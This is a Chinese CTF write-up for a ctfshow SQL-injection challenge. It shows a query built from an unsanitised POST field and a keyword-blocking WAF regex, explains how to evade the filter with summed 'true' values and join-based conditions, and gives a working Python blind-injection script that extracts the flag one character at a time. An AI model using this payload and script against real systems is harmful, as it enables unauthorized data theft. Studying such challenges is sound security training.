题目

查询语句

$sql = "select count(*) from ".$_POST['tableName'].";";

返回逻辑

  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }

查询结果

      $user_count = 0;

解题思路

这道题过滤了空格 select where 这些我们可以操作的字符串,甚至连数字都过滤掉了,可以说是很变态了
下面是Y4师傅给的一张图片

数字的过滤我们可以无限的加ture来绕过
而过滤了where 我们可以用join on 来替代
先手测一下
tableName=ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,true,true)regexp(char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true)))
返回:$user_count = 43;
下面给出exp

import requests
url = "http://e0acf55b-bc41-41d2-ae36-35ae305e7a09.challenge.ctf.show/select-waf.php"
flag = "ctfshow{"
dictionary = "0123456789abcdefghijklmnopqrstuvwxyz}-"
def createNum(n):
    num = 'true'
    if n == 1:
        return num
    else:
        for i in range(n - 1):
            num += "+true"
    return num
for i in range(45):
    if i <= 8:
        continue
    for j in range(127):
        data = {
            "tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{createNum(i)},{createNum(1)})regexp(char({createNum(j)})))"
        }
        r = requests.post(url, data=data)
        if r.text.find("$user_count = 43;") > 0:
            if chr(j) != ".":
                flag += chr(j)
                print(flag.lower())
                if chr(j) == "}":
                    exit(0)
                break